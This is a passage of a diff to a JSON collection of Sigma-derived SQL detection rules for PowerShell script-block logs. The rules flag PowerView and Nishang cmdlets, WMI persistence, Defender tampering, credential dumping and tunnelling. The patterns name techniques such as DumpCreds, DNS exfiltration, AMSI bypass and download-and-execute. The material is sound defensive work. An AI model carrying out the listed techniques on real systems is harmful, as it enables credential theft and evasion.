ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level - PowerShell", - "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "status": "experimental", - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "title": "Powershell WMI Persistence", + "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "status": "test", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Administrator script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND 
Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml" + "filename": "posh_ps_wmi_persistence.yml" }, { - "title": "PowerShell Write-EventLog Usage", - "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", - "status": "experimental", - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. 
The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADReplAccount", + "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "status": "test", + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_write_eventlog.yml" + "filename": "posh_ps_get_adreplaccount.yml" }, { - "title": "PowerShell Create Local User", - "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "title": "Suspicious Unblock-File", + "id": "5947497f-1aa4-41dd-9693-c9848d58727d", "status": "test", - "description": "Detects creation of a local user via PowerShell", - "author": "@ROxPinTeddy", + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "author": "frack113", "tags": [ - 
"attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ - "Legitimate user creation" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" ], - "filename": "posh_ps_create_local_user.yml" + "filename": "posh_ps_susp_unblock_file.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Start-Process PassThru", + "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "status": "test", + "description": "Powershell use PassThru option to start in background", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "posh_ps_susp_start_process.yml" }, { - "title": "Suspicious PowerShell Get Current User", - "id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects the use of PowerShell to identify the current logged user.", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%[System.Environment]::UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%$env:UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Security.Principal.WindowsIdentity]::GetCurrent()%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' 
ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_current_user.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Powershell XML Execute Command", - "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "title": "Potential Suspicious Windows Feature Enabled", + "id": "55c925c1-7195-426b-a136-a9396800e29b", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate usage of the features listed in the rule." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "posh_ps_xml_iex.yml" + "filename": "posh_ps_enable_susp_windows_optional_feature.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "Automated Collection Command PowerShell", - "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "title": "Suspicious TCP Tunnel Via PowerShell Script", + "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "status": "experimental", + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + 
"attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" ], - "filename": "posh_ps_automated_collection.yml" + "filename": "posh_ps_susp_proxy_scripts.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate 
PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' 
ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" - ], - "filename": "posh_ps_tamper_defender.yml" - }, - { - "title": "Execute Invoke-command on Remote Host", - "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "author": "frack113", - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ], - "falsepositives": [ - "Legitimate script" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR 